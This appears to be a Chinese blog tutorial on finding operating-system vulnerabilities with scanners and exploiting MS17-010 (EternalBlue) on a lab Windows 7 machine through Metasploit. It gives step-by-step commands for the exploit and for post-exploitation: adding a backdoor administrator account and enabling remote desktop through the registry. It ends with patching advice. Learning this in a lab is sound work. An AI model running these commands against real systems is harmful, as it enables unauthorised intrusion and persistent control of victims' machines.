操作系统漏洞发现

时间:2022-06-08 01:10:23


前言

不管是对于App来说,还是web站点来说,操作系统是必须的,对于任何一个站点,进行渗透,无非就是渗透如下几个方面:

  1. 操作系统,进行信息收集后,查看站点操作系统是否为最新版本,如果不是,在网上搜索,看当前操作系统是否有漏洞出现
  2. 系统软件,进行信息收集后,通过看站点所开放的端口,可以大致确定对方站点系统所使用的软件,入80端口,就是http服务端口,对方站点应该有web站点,开发8080对方站点可能有apache等软件,在网上查找,看当前apache版本是否有漏洞
  3. 第三方软件,如phpmyadmin,ssh工具等,看这个版本的软件是否有漏洞
  4. 最后一步才是对站点网站进行渗透,看网站是否有sql注入,逻辑漏洞等

如下是针对操作系统漏洞发现的类容:


一、操作系统漏洞发现

想要发现操作系统漏洞,不用想,肯定是工具扫描啊,推荐如下三款工具,namp,Goby,nessus。

1.1 namp

namp扫描教程

如上教程中的脚本利用就是操作系统漏洞扫描,如下是我扫描windows7靶机的结果,由于安装的是没有进行更新的windows,所以存在该漏洞,图如下所示:

操作系统漏洞发现

2. Goby

Goby使用的是忍者操作系统上面的,忍者操作系统下载:忍者操作系统安装教程,进行漏洞扫描,就如下两步,把英文设置为中文之后,一切操作都非常简单,具体操作如下所示:
操作系统漏洞发现

操作系统漏洞发现

如上所示,点击开始就可以进行漏洞扫描了,全部扫描结果以可视化的方式进行展现,非常的人性化。

3. Nessus

Nessus是三款工具中最优秀的,Nessus的安装教程:Nessus安装教程,安装好之后就可以进行漏洞扫描了,其中的操作在安装教程中有说,我这里就不进行重新说明了:

二,进行渗透测试

2.1 使用工具进行渗透

1. metasploit
  1. 开启metasploit,及打开metasploit的控制台,使用如下两条命令:

    service postgresql start  # 开启数据库postgresq
    msfconsole  # 打开控制台
    
  2. 搜索ms17-010可以利用的漏洞模块,再次确定是否存在漏洞,如下所示:
    操作系统漏洞发现

    search ms17-010  # 搜索模块
    use 3  # 使用第三个模块,看目标主机是否存在这个漏洞(进一步的确定)
    show options  # 查看需要设置的参数
    set rhost 192.168.93.134  # 设置参数,目标机器的IP地址为 192.168.93.134
    run  # 进行攻击,exploit命令也可以
    

    操作系统漏洞发现

  3. 搜索ms17-010可以利用的漏洞模块,对漏洞进行攻击,控制目标机器,如下所示:依次使用如下几条命令

search ms17-010
use 0  # 使用攻击模块攻击主机
show options
set rhost 192.168.93.134  设置攻击的目标地址
exploit

操作系统漏洞发现
4. 进行提权等一系列操作

shell  # 控制目标机器
net user root 123456 /add  # 创建普通用户
net localgroup administrators root /add  # 对普通用户进行提权

进行如下操作后,你打开windows目标机器,你会发现多了一个超级管理员用户如下所示:

操作系统漏洞发现
5. 远程访问控制

首先输入REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f,打开目标机器的3389端口,该端口开放后就可以进行远程连接了:

操作系统漏洞发现

开放端口之后,在新的终端进行远程桌面的连接,如下所示:

rdesktop 192.168.93.134:3389  # 进行远程连接目标机器,192.168.93.134是我目标机器的IP地址

操作系统漏洞发现

如上再输入yes就是远程桌面的连接了,连接后的结果如下所示:

操作系统漏洞发现
操作系统漏洞发现

2.2 EXP

EXP是漏洞攻击的代码,可以进入如下两个网站进行查找,如下所示:
seebug漏洞平台
国家漏洞安全平台
操作系统漏洞发现
漏洞利用数据库

2.3 复现文章

复现文章网上都有,直接寻找,如永恒之蓝:

操作系统漏洞发现
搜索技巧:
信息搜集

三,操作系统漏洞修复

  1. 针对设计错误,微软公司会及时推出补丁程序,用户只需及时下载并安装即可,因此建议用户经常浏览微软的安全公告,并及时下载补丁。

  2. 对于设置错误,则应及时修改配置,使系统更加安全可靠。